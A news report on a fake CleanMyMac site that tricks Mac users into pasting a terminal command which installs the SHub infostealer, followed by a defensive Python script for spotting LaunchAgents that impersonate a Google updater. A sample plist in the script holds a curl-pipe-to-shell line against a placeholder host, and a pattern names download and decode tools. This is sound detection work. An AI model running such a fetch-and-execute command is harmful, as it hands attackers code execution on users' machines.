- Fake CleanMyMac tool spreads SHub infostealer
- Attacks trick users into entering terminal commands
- Malware steals credentials and crypto, then maintains access via a backdoor
A fake utility tricked macOS users into installing infostealer malware that exfiltrates passwords, sensitive files and even money, experts have warned.
Security researchers at Malwarebytes said the program was part of a wider, highly sophisticated campaign that also included a custom website, spoofing of a reputable brand, a loader and the good old ClickFix approach.
The researchers said the campaign spoofed CleanMyMac, a legitimate Mac optimization program built by MacPaw, and created a nearly identical site at the cleanmymacos[DOT]org domain, making it easy for people to mistake it for the real thing. But instead of simply downloading and running an installer, victims are prompted to open a terminal and paste a command that retrieves the payload from a third-party server.
Steal files and establish persistence
“Instead of exploiting a vulnerability, it tricks the user into running the malware themselves,” Malwarebytes explained. “Because the command is executed voluntarily, protections such as Gatekeeper, notarization checks, and XProtect offer little protection once the user enters the command and presses Return.”
The malware installed this way is called SHub, and during installation it asks the victim for their macOS password. Since the entire installation process is somewhat unorthodox and could look like something an advanced user would do, victims may dismiss the prompt as standard practice, the researchers explained.
However, the password actually gives SHub access to the macOS keychain, Wi-Fi credentials, app tokens, and other private keys.
“With the password in hand, SHub begins a systematic scan of the machine,” the Malwarebytes researchers said.
After stealing passwords, cookies, autofill data, crypto wallet extensions, iCloud account data, Telegram session files and other valuables, it drops a second-stage backdoor that replaces some cryptocurrency wallet apps with malicious copies. That way, the malware maintains persistence and even enables further crypto theft down the line.
Finally, the crooks install a LaunchAgent disguised as a Google update service.
“In practice, this allows the attackers to run commands on the infected Mac at any time until the persistence mechanism is discovered and removed,” the report concluded.
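The persistence step described above, a LaunchAgent borrowing a Google update service's name, is something a defender can triage by reading the plist rather than trusting the label. The script below is an added example and is not code from the article or from Malwarebytes' report. It parses LaunchAgent plists and flags ones that name-drop Google while launching from outside Google's own directories, that run a shell one-liner with download or decode tooling, or that execute from a scratch or hidden directory. The directory layout assumed for a genuine Google updater (under a Library/Google folder) and all three sample plists are constructed for the example; the `.invalid` hostname is a placeholder.

```python
"""Heuristic triage of macOS LaunchAgent plists that impersonate a vendor updater.

Added example: flags agents whose Label or executable mentions Google but whose
program does not live where a Google updater would, shell one-liners that fetch
or decode content, and executables parked in scratch or hidden directories.
Confirm any hit by checking the binary's code signature and how it arrived.
"""
import plistlib
import re
from typing import Dict, List

# Where a real Google updater binary normally lives (assumption, not from the article).
GOOGLE_HOME_MARKERS = ("/Library/Google/", "/Applications/Google")
SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/env"}
DOWNLOADER_WORDS = re.compile(r"\b(curl|wget|base64|osascript|nohup)\b")
SCRATCH_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/var/folders/")

# Constructed sample plists. LEGIT imitates a normal updater layout; the other
# two borrow Google-sounding names but launch from places an updater would not.
LEGIT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key><array>
    <string>/Users/alice/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdateAgent</string>
    <string>-runMode</string><string>ifneeded</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

SUSPECT_SHELL_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.update.agent</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -fsSL http://PLACEHOLDER.invalid/update.sh | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

SUSPECT_HIDDEN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>Program</key><string>/Users/alice/Library/.gupdate/GoogleUpdater</string>
  <key>KeepAlive</key><true/>
</dict></plist>"""

SAMPLES: Dict[str, bytes] = {
    "legit.plist": LEGIT_PLIST,
    "suspect-shell.plist": SUSPECT_SHELL_PLIST,
    "suspect-hidden.plist": SUSPECT_HIDDEN_PLIST,
}


def program_of(agent: dict) -> List[str]:
    """Return the argv launchd would run, whichever key the plist uses."""
    if "ProgramArguments" in agent:
        return list(agent["ProgramArguments"])
    if "Program" in agent:
        return [str(agent["Program"])]
    return []


def audit_launch_agent(plist_bytes: bytes) -> List[str]:
    """Return finding strings for one agent; an empty list means clean by these rules."""
    agent = plistlib.loads(plist_bytes)
    label = str(agent.get("Label", "")).lower()
    argv = program_of(agent)
    if not argv:
        return ["no Program or ProgramArguments: nothing to launch"]
    exe = argv[0]
    findings: List[str] = []

    # 1. Claims to be Google but runs from outside Google's own directories.
    claims_google = "google" in label or "google" in exe.lower()
    if claims_google and not any(marker in exe for marker in GOOGLE_HOME_MARKERS):
        findings.append(f"vendor-name mismatch: label {label!r} runs {exe}")

    # 2. A shell interpreter whose one-liner fetches or decodes content.
    if exe in SHELLS and DOWNLOADER_WORDS.search(" ".join(argv[1:])):
        findings.append("shell one-liner with download/decode tooling")

    # 3. Executable parked in a scratch directory or a hidden (dot) directory.
    if exe.startswith(SCRATCH_DIRS) or "/." in exe:
        findings.append(f"untrusted executable location: {exe}")

    # 4. Note persistence flags only when something above already looks wrong.
    if findings and (agent.get("RunAtLoad") or agent.get("KeepAlive")):
        findings.append("persistent: RunAtLoad/KeepAlive set")
    return findings


def audit_all(samples: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Audit a name->plist mapping and return only the entries with findings."""
    return {name: f for name, data in samples.items() if (f := audit_launch_agent(data))}


if __name__ == "__main__":
    for name, findings in audit_all(SAMPLES).items():
        print(name)
        for line in findings:
            print("  -", line)
```

On a live system the same function can be fed the contents of each file in `~/Library/LaunchAgents` and `/Library/LaunchAgents`; a genuine updater should produce no findings, and any agent that trips the vendor-name or location rules deserves a code-signature check before it is trusted.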